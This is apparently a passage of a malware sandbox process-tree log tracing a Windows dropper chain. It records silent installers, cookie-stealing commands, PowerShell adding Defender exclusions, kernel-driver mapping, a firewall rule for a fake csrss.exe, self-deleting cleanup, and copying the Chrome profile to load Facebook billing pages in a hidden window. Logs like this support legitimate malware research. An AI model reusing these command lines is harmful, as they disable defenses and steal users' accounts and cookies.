C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt48⤵PID:7416
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0mpehz0c5gp\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\0mpehz0c5gp\chashepro3.exe" /VERYSILENT43⤵PID:3820
-
C:\Users\Admin\AppData\Local\Temp\is-G0HQQ.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-G0HQQ.tmp\chashepro3.tmp" /SL5="$20922,1478410,58368,C:\Users\Admin\AppData\Local\Temp\0mpehz0c5gp\chashepro3.exe" /VERYSILENT44⤵PID:10844
-
-
-
C:\Users\Admin\AppData\Local\Temp\lycdfr45zht\vkmuuuiw4uq.exe"C:\Users\Admin\AppData\Local\Temp\lycdfr45zht\vkmuuuiw4uq.exe" /ustwo INSTALL43⤵PID:10380
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "vkmuuuiw4uq.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\lycdfr45zht\vkmuuuiw4uq.exe" & exit44⤵PID:7864
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "vkmuuuiw4uq.exe" /f45⤵
- Kills process with taskkill
PID:11856
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a5qrfudedzi\app.exe"C:\Users\Admin\AppData\Local\Temp\a5qrfudedzi\app.exe" /8-2343⤵PID:11944
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Withered-Forest"44⤵PID:4016
-
-
C:\Program Files (x86)\Withered-Forest\7za.exe"C:\Program Files (x86)\Withered-Forest\7za.exe" e -p154.61.71.51 winamp-plugins.7z44⤵PID:9508
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Withered-Forest\app.exe" -map "C:\Program Files (x86)\Withered-Forest\WinmonProcessMonitor.sys""44⤵PID:7068
-
C:\Program Files (x86)\Withered-Forest\app.exe"C:\Program Files (x86)\Withered-Forest\app.exe" -map "C:\Program Files (x86)\Withered-Forest\WinmonProcessMonitor.sys"45⤵PID:10384
-
-
-
C:\Program Files (x86)\Withered-Forest\7za.exe"C:\Program Files (x86)\Withered-Forest\7za.exe" e -p154.61.71.51 winamp.7z44⤵PID:3800
-
-
C:\Program Files (x86)\Withered-Forest\app.exe"C:\Program Files (x86)\Withered-Forest\app.exe" /8-2344⤵PID:9740
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-0B680.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-0B680.tmp\Delta.exe" /Verysilent32⤵PID:11296
-
C:\Users\Admin\AppData\Local\Temp\is-AMESH.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-AMESH.tmp\Delta.tmp" /SL5="$A0266,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-0B680.tmp\Delta.exe" /Verysilent33⤵PID:12200
-
C:\Users\Admin\AppData\Local\Temp\is-R2KGP.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-R2KGP.tmp\Setup.exe" /VERYSILENT34⤵PID:10360
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-R2KGP.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit35⤵PID:12256
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f36⤵
- Kills process with taskkill
PID:7452
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 636⤵
- Delays execution with timeout.exe
PID:6772
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-0B680.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-0B680.tmp\zznote.exe" /Verysilent32⤵PID:9224
-
C:\Users\Admin\AppData\Local\Temp\is-DQJ6C.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-DQJ6C.tmp\zznote.tmp" /SL5="$D0554,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-0B680.tmp\zznote.exe" /Verysilent33⤵PID:8148
-
C:\Users\Admin\AppData\Local\Temp\is-AOJDV.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-AOJDV.tmp\jg4_4jaa.exe" /silent34⤵PID:7328
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-0B680.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-0B680.tmp\hjjgaa.exe" /Verysilent32⤵PID:12280
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt33⤵PID:4760
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt33⤵PID:11580
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\acjr3nbzbso\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\acjr3nbzbso\chashepro3.exe" /VERYSILENT28⤵PID:1984
-
C:\Users\Admin\AppData\Local\Temp\is-B2CP6.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-B2CP6.tmp\chashepro3.tmp" /SL5="$1072C,1478410,58368,C:\Users\Admin\AppData\Local\Temp\acjr3nbzbso\chashepro3.exe" /VERYSILENT29⤵PID:6196
-
-
-
C:\Users\Admin\AppData\Local\Temp\mzhh0acclzs\rcsx4cukvi3.exe"C:\Users\Admin\AppData\Local\Temp\mzhh0acclzs\rcsx4cukvi3.exe" /ustwo INSTALL28⤵PID:196
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "rcsx4cukvi3.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\mzhh0acclzs\rcsx4cukvi3.exe" & exit29⤵PID:10104
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "rcsx4cukvi3.exe" /f30⤵
- Kills process with taskkill
PID:10196
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\losovjlgrmw\app.exe"C:\Users\Admin\AppData\Local\Temp\losovjlgrmw\app.exe" /8-2328⤵PID:8560
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Black-Butterfly"29⤵PID:8568
-
-
C:\Program Files (x86)\Black-Butterfly\7za.exe"C:\Program Files (x86)\Black-Butterfly\7za.exe" e -p154.61.71.51 winamp-plugins.7z29⤵PID:9300
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Black-Butterfly\app.exe" -map "C:\Program Files (x86)\Black-Butterfly\WinmonProcessMonitor.sys""29⤵PID:10056
-
C:\Program Files (x86)\Black-Butterfly\app.exe"C:\Program Files (x86)\Black-Butterfly\app.exe" -map "C:\Program Files (x86)\Black-Butterfly\WinmonProcessMonitor.sys"30⤵PID:6160
-
-
-
C:\Program Files (x86)\Black-Butterfly\7za.exe"C:\Program Files (x86)\Black-Butterfly\7za.exe" e -p154.61.71.51 winamp.7z29⤵PID:8220
-
-
C:\Program Files (x86)\Black-Butterfly\app.exe"C:\Program Files (x86)\Black-Butterfly\app.exe" /8-2329⤵PID:7852
-
C:\Program Files (x86)\Black-Butterfly\app.exe"C:\Program Files (x86)\Black-Butterfly\app.exe" /8-2330⤵PID:4820
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0bazs4sesnd\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\0bazs4sesnd\askinstall24.exe"28⤵PID:9000
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe29⤵PID:14768
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe30⤵
- Kills process with taskkill
PID:14432
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y29⤵PID:15184
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/29⤵PID:11924
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1648,4149518919549534017,5024086260611860495,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1660 /prefetch:830⤵PID:14804
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\iqlrpytiafb\vict.exe"C:\Users\Admin\AppData\Local\Temp\iqlrpytiafb\vict.exe" /VERYSILENT /id=53528⤵PID:5140
-
C:\Users\Admin\AppData\Local\Temp\is-J00PB.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-J00PB.tmp\vict.tmp" /SL5="$40FA2,870426,780800,C:\Users\Admin\AppData\Local\Temp\iqlrpytiafb\vict.exe" /VERYSILENT /id=53529⤵PID:14492
-
C:\Users\Admin\AppData\Local\Temp\is-N69BE.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-N69BE.tmp\wimapi.exe" 53530⤵PID:8900
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1klvzvunzaq\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\1klvzvunzaq\Setup3310.exe" /Verysilent /subid=57728⤵PID:14340
-
C:\Users\Admin\AppData\Local\Temp\is-RP8KF.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-RP8KF.tmp\Setup3310.tmp" /SL5="$50DCA,802346,56832,C:\Users\Admin\AppData\Local\Temp\1klvzvunzaq\Setup3310.exe" /Verysilent /subid=57729⤵PID:14436
-
C:\Users\Admin\AppData\Local\Temp\is-36IEE.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-36IEE.tmp\Setup.exe" /Verysilent30⤵PID:14620
-
C:\Users\Admin\AppData\Local\Temp\is-4NHO9.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-4NHO9.tmp\Setup.tmp" /SL5="$40F7A,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-36IEE.tmp\Setup.exe" /Verysilent31⤵PID:14924
-
C:\Users\Admin\AppData\Local\Temp\is-DJMAL.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-DJMAL.tmp\PictureLAb.exe" /Verysilent32⤵PID:6916
-
C:\Users\Admin\AppData\Local\Temp\is-RU82S.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-RU82S.tmp\PictureLAb.tmp" /SL5="$51088,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-DJMAL.tmp\PictureLAb.exe" /Verysilent33⤵PID:13528
-
C:\Users\Admin\AppData\Local\Temp\is-E25NI.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-E25NI.tmp\Setup.exe" /VERYSILENT34⤵PID:15056
-
C:\Users\Admin\AppData\Local\Temp\is-65IMU.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-65IMU.tmp\Setup.tmp" /SL5="$310AE,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-E25NI.tmp\Setup.exe" /VERYSILENT35⤵PID:12836
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-DJMAL.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-DJMAL.tmp\Delta.exe" /Verysilent32⤵PID:14564
-
C:\Users\Admin\AppData\Local\Temp\is-DDOPG.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-DDOPG.tmp\Delta.tmp" /SL5="$61088,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-DJMAL.tmp\Delta.exe" /Verysilent33⤵PID:14584
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\mgoowv0ywxq\oz5mmsmyhov.exe"C:\Users\Admin\AppData\Local\Temp\mgoowv0ywxq\oz5mmsmyhov.exe" /ustwo INSTALL28⤵PID:14524
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "oz5mmsmyhov.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\mgoowv0ywxq\oz5mmsmyhov.exe" & exit29⤵PID:14572
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "oz5mmsmyhov.exe" /f30⤵
- Kills process with taskkill
PID:12372
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4yw4o3cadfr\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\4yw4o3cadfr\chashepro3.exe" /VERYSILENT28⤵PID:14636
-
C:\Users\Admin\AppData\Local\Temp\is-KGUIS.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-KGUIS.tmp\chashepro3.tmp" /SL5="$110D8,1478410,58368,C:\Users\Admin\AppData\Local\Temp\4yw4o3cadfr\chashepro3.exe" /VERYSILENT29⤵PID:14820
-
-
-
C:\Users\Admin\AppData\Local\Temp\mf2irwlgqvn\app.exe"C:\Users\Admin\AppData\Local\Temp\mf2irwlgqvn\app.exe" /8-2328⤵PID:14416
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Polished-Cloud"29⤵PID:14888
-
-
C:\Program Files (x86)\Polished-Cloud\7za.exe"C:\Program Files (x86)\Polished-Cloud\7za.exe" e -p154.61.71.51 winamp-plugins.7z29⤵PID:8308
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-2FQOM.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-2FQOM.tmp\Delta.exe" /Verysilent17⤵PID:6216
-
C:\Users\Admin\AppData\Local\Temp\is-V7AOK.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-V7AOK.tmp\Delta.tmp" /SL5="$3034C,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-2FQOM.tmp\Delta.exe" /Verysilent18⤵PID:8044
-
C:\Users\Admin\AppData\Local\Temp\is-89LB3.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-89LB3.tmp\Setup.exe" /VERYSILENT19⤵PID:7432
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-89LB3.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit20⤵PID:4812
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f21⤵
- Kills process with taskkill
PID:4676
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 621⤵
- Delays execution with timeout.exe
PID:9484
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-2FQOM.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-2FQOM.tmp\zznote.exe" /Verysilent17⤵PID:8656
-
C:\Users\Admin\AppData\Local\Temp\is-BU158.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-BU158.tmp\zznote.tmp" /SL5="$5034C,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-2FQOM.tmp\zznote.exe" /Verysilent18⤵PID:4596
-
C:\Users\Admin\AppData\Local\Temp\is-BQT5E.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-BQT5E.tmp\jg4_4jaa.exe" /silent19⤵PID:7588
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-2FQOM.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-2FQOM.tmp\hjjgaa.exe" /Verysilent17⤵PID:9844
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt18⤵PID:9612
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt18⤵PID:8260
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5czgggcnszi\l2zxmgnr1h5.exe"C:\Users\Admin\AppData\Local\Temp\5czgggcnszi\l2zxmgnr1h5.exe" /ustwo INSTALL13⤵PID:4396
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "l2zxmgnr1h5.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\5czgggcnszi\l2zxmgnr1h5.exe" & exit14⤵PID:7008
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "l2zxmgnr1h5.exe" /f15⤵
- Kills process with taskkill
PID:4976
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\xa2voagj1gg\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\xa2voagj1gg\chashepro3.exe" /VERYSILENT13⤵PID:5760
-
C:\Users\Admin\AppData\Local\Temp\is-UDSMI.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-UDSMI.tmp\chashepro3.tmp" /SL5="$205D8,1478410,58368,C:\Users\Admin\AppData\Local\Temp\xa2voagj1gg\chashepro3.exe" /VERYSILENT14⤵PID:8076
-
-
-
C:\Users\Admin\AppData\Local\Temp\snapds211xx\app.exe"C:\Users\Admin\AppData\Local\Temp\snapds211xx\app.exe" /8-2313⤵PID:7004
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Lingering-Forest"14⤵PID:8168
-
-
C:\Program Files (x86)\Lingering-Forest\7za.exe"C:\Program Files (x86)\Lingering-Forest\7za.exe" e -p154.61.71.51 winamp-plugins.7z14⤵PID:5852
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Lingering-Forest\app.exe" -map "C:\Program Files (x86)\Lingering-Forest\WinmonProcessMonitor.sys""14⤵PID:5144
-
C:\Program Files (x86)\Lingering-Forest\app.exe"C:\Program Files (x86)\Lingering-Forest\app.exe" -map "C:\Program Files (x86)\Lingering-Forest\WinmonProcessMonitor.sys"15⤵PID:7788
-
-
-
C:\Program Files (x86)\Lingering-Forest\7za.exe"C:\Program Files (x86)\Lingering-Forest\7za.exe" e -p154.61.71.51 winamp.7z14⤵PID:8132
-
-
C:\Program Files (x86)\Lingering-Forest\app.exe"C:\Program Files (x86)\Lingering-Forest\app.exe" /8-2314⤵PID:5208
-
C:\Program Files (x86)\Lingering-Forest\app.exe"C:\Program Files (x86)\Lingering-Forest\app.exe" /8-2315⤵PID:4408
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"16⤵PID:10756
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes17⤵PID:11004
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\tsteh3o3xx4\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\tsteh3o3xx4\askinstall24.exe"13⤵PID:4816
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe14⤵PID:7988
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe15⤵
- Kills process with taskkill
PID:10788
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y14⤵PID:7948
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/14⤵PID:7116
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffe20d06e00,0x7ffe20d06e10,0x7ffe20d06e2015⤵PID:13180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1684,16556172912818011607,2908588870974306704,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=2248 /prefetch:815⤵PID:11816
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1684,16556172912818011607,2908588870974306704,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1764 /prefetch:815⤵PID:6632
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1684,16556172912818011607,2908588870974306704,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1700 /prefetch:215⤵PID:372
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1684,16556172912818011607,2908588870974306704,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2928 /prefetch:115⤵PID:13164
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1684,16556172912818011607,2908588870974306704,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2924 /prefetch:115⤵PID:12264
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1684,16556172912818011607,2908588870974306704,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:115⤵PID:12212
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1684,16556172912818011607,2908588870974306704,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2376 /prefetch:115⤵PID:13684
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1684,16556172912818011607,2908588870974306704,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:115⤵PID:8876
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1684,16556172912818011607,2908588870974306704,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=4576 /prefetch:815⤵PID:11520
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1684,16556172912818011607,2908588870974306704,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=4596 /prefetch:815⤵PID:9136
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1684,16556172912818011607,2908588870974306704,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:115⤵PID:12444
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1684,16556172912818011607,2908588870974306704,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:115⤵PID:13020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1684,16556172912818011607,2908588870974306704,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5680 /prefetch:115⤵PID:14328
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1684,16556172912818011607,2908588870974306704,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:115⤵PID:13572
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1684,16556172912818011607,2908588870974306704,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:115⤵PID:13112
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1684,16556172912818011607,2908588870974306704,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1408 /prefetch:115⤵PID:8616
-
-
